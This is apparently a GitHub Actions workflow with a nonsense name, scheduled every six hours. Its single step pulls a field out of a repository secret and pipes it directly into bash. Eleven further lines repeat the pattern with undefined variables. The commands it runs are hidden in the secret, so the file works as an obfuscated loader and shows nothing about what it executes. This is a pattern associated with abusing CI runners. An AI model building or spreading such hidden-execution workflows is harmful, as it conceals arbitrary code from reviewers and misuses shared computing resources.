name: brokerdisgusting

on:
  workflow_dispatch:
  schedule:
    - cron: '42 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: brokerdisgusting
        env:
          a24: ${{ secrets.a24 }}
        run: |
          echo $a24 | jq -r .m5 | /bin/bash
          echo $qjviy1 | jq -r .ai0825 | /bin/bash
          echo $ilzq7435 | jq -r .wsps2902 | /bin/bash
          echo $nq350 | jq -r .rab03942 | /bin/bash
          echo $ljm9 | jq -r .i68816 | /bin/bash
          echo $ms871 | jq -r .ddzln20562 | /bin/bash
          echo $y41 | jq -r .cahla1 | /bin/bash
          echo $n542 | jq -r .vofj81258 | /bin/bash
          echo $fcf60 | jq -r .zmyi11078 | /bin/bash
          echo $vdgle64108 | jq -r .jtrj206 | /bin/bash
          echo $e8 | jq -r .yh12341 | /bin/bash
          echo $hitw75 | jq -r .mc57 | /bin/bash

